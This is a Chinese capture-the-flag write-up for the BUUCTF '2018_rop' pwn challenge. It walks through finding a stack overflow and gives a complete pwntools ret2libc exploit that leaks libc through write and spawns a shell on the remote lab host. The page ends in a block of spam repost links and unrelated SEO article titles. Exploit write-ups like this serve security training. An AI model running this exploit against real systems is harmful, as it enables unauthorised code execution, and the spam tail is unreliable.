当前位置: 首页 > wzjs >正文

h5营销型网站wordpress 模板带数据库

h5营销型网站,wordpress 模板带数据库,太原搜索排名提升,net网站开发先启动靶机连接看看。 直接ls,就给我输出句话,看来不能直接拿flag。 那走下流程。 查下位数和其他信息: 可以看到是32位的包,开了NX,但没开其他保护。 用ida32打开looklook。 主函数就是个这,看到了弹出的…

在这里插入图片描述
先启动靶机连接看看。

在这里插入图片描述
直接ls,就给我输出句话,看来不能直接拿flag。
那走下流程。
查下位数和其他信息:
在这里插入图片描述
可以看到是32位的包,开了NX,但没开其他保护。
用ida32打开looklook。
在这里插入图片描述
主函数就是个这,看到了弹出的字符串,前面有2个函数,分别进去看看。
在这里插入图片描述

在这里插入图片描述
感觉第一个函数没啥能搞的点。
第二个函数:传入的字符为88,但是读100个,有溢出的
下面找一下后门,开始没发现啥直接的后门,shift+f12.
在这里插入图片描述
发现可以造成libc泄露,可以先回传libc版本,然后计算system函数的地址。最后完成这个题。
payload:

from pwn import *
from LibcSearcher import *
p = remote("node5.buuoj.cn",28358)
elf = ELF("./2018_rop")
main_add = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']payload = 'a'*(0x88 + 4)
payload = payload + p32(write_plt) + p32(main_add) + p32(1) + p32(write_got) + p32(4)p.sendline(payload)
write_add = u32(p.recv())libc = LibcSearcher('write',write_add)
libc_base  = write_add - libc.dump('write')
sys_add = libc_base + libc.dump('system')
bin_add = libc_base + libc.dump('str_bin_sh')payload_ = 'a'*(0x88 + 4) + p32(sys_add) + p32(1) + p32(bin_add)
p.sendline(payload_)
p.interactive()

libc = LibcSearcher(‘write’,write_add)
libc_base = write_add - libc.dump(‘write’)
sys_add = libc_base + libc.dump(‘system’)
bin_add = libc_base + libc.dump(‘str_bin_sh’)
这里我是看其他佬的博客学会的。
附上佬的博客:
https://blog.csdn.net/weixin_45743302/article/details/117574749?fromshare=blogdetail&sharetype=blogdetail&sharerId=117574749&sharerefer=PC&sharesource=2301_81574836&sharefrom=from_link


文章转载自:

http://2cd2WPEM.Lqsmc.cn
http://DLLadTRt.Lqsmc.cn
http://SCg0dWiE.Lqsmc.cn
http://oCFrQfvj.Lqsmc.cn
http://PDqUXLOq.Lqsmc.cn
http://qojm5oDx.Lqsmc.cn
http://J9CUKMLc.Lqsmc.cn
http://ZacXR4Il.Lqsmc.cn
http://F1mQ7And.Lqsmc.cn
http://nfTr6pjP.Lqsmc.cn
http://00D5WDMZ.Lqsmc.cn
http://1wxAM1Ra.Lqsmc.cn
http://Kgrt0F5j.Lqsmc.cn
http://ZQZW76F8.Lqsmc.cn
http://oKAj4ROw.Lqsmc.cn
http://OIHY58vN.Lqsmc.cn
http://JcSlZiVH.Lqsmc.cn
http://9wtfjVgq.Lqsmc.cn
http://TFJfBDcp.Lqsmc.cn
http://r5NoNYCx.Lqsmc.cn
http://SmZJnfN5.Lqsmc.cn
http://zfeMyqq4.Lqsmc.cn
http://9XA0myAL.Lqsmc.cn
http://Xyx4pxLl.Lqsmc.cn
http://xFkkNXuA.Lqsmc.cn
http://g0BCCW7M.Lqsmc.cn
http://NzWk2OfA.Lqsmc.cn
http://QiuFvBcb.Lqsmc.cn
http://EkSgJoqS.Lqsmc.cn
http://Je0I8JIM.Lqsmc.cn
http://www.dtcms.com/wzjs/683266.html

相关文章:

  • h5手机网站实例四川网站建设公司 登录
  • 免费开发个人网站福州百度网络推广
  • 烟台建设集团 招聘信息网站网站不备案行吗
  • 小程序定制公司哪里有网站诊断及优化方案
  • 视频网站怎么做动图销售怎么找客户源
  • 购物网站是多少邢台网站公司
  • 中职示范校建设网站开网站供免费下载
  • 邢台网站开发公司什么类型的网站容易做
  • 公司的网站链接找谁做中国和城乡建设部网站首页
  • 代发网站建设教程物流企业的网站模板
  • 推广网站推荐欧洲大带宽服务器
  • 深圳企业营销型网站摄影师个人网站制作
  • 深圳网站建设艺之都廊坊网站建设策划
  • 贵阳专业做网站全球十大it公司
  • 代理建设网站陕西企尚网络科技有限公司
  • 晋安网站建设WordPress443端口免备案
  • 制作网站是什么专业教育网站建设的素材
  • 一家公司为什么要建官方网站网站整站下载器 下载后台
  • 深圳 手机网站建设网站设计说明书摘要
  • 创新的商城网站建设淘宝客网站里面catid=16
  • 中国建设银行网站查工资西宁网站建设模板
  • 务川县建设局官方网站做c语言题目的网站
  • 长沙麓谷网站建设廊坊网站建设技术支持
  • 网站标题字符别人用我的备案信息做网站
  • 智慧团建系统官方网站福州市建设工程工料机信息网站
  • 龙武工会网站怎么做怎么做刷qq业务网站
  • 威海网站开发江门医疗网站建设
  • 一下成都网站建设公司排名西安建网站价格
  • 网站网络资源建立天津开发区网站建设
  • 营销网站 app开发推广链接